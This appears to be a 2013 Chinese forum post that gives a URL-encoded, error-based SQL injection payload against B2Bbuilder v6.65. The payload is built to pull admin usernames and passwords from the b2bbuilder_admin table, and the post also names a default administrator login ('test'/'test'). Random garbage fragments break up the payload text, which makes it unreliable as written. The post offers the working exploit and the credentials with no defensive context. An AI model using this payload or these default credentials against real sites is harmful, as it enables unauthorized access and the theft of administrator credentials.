测试的程序版本为:B2Bbuilder_v6.65 ]. ?# N: M$ k4 P$ l
: @1 T8 ?' i, P1 Q h
0 ?& E3 C/ k9 p1 f% W* {http://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%28, W) W8 {) [ l) p
select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password
) f9 k* |% `0 ^0 p4 r3 C" B%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C11 @. R( ~3 r' }2 `, ?5 b. M
%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29
+ F* P. w) I u8 D- x# B: l% v*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1! v4 I" _9 {5 |' f h! d
1 x/ z; |0 Y$ q+ X% J6 o这个B2B程序还有一个默认的管理员帐号,帐号密码都是test
1 L! Z: j/ J$ o' e
: f# S! T9 D6 \ |
发表于 2013-7-26 12:44:48
收藏
支持
反对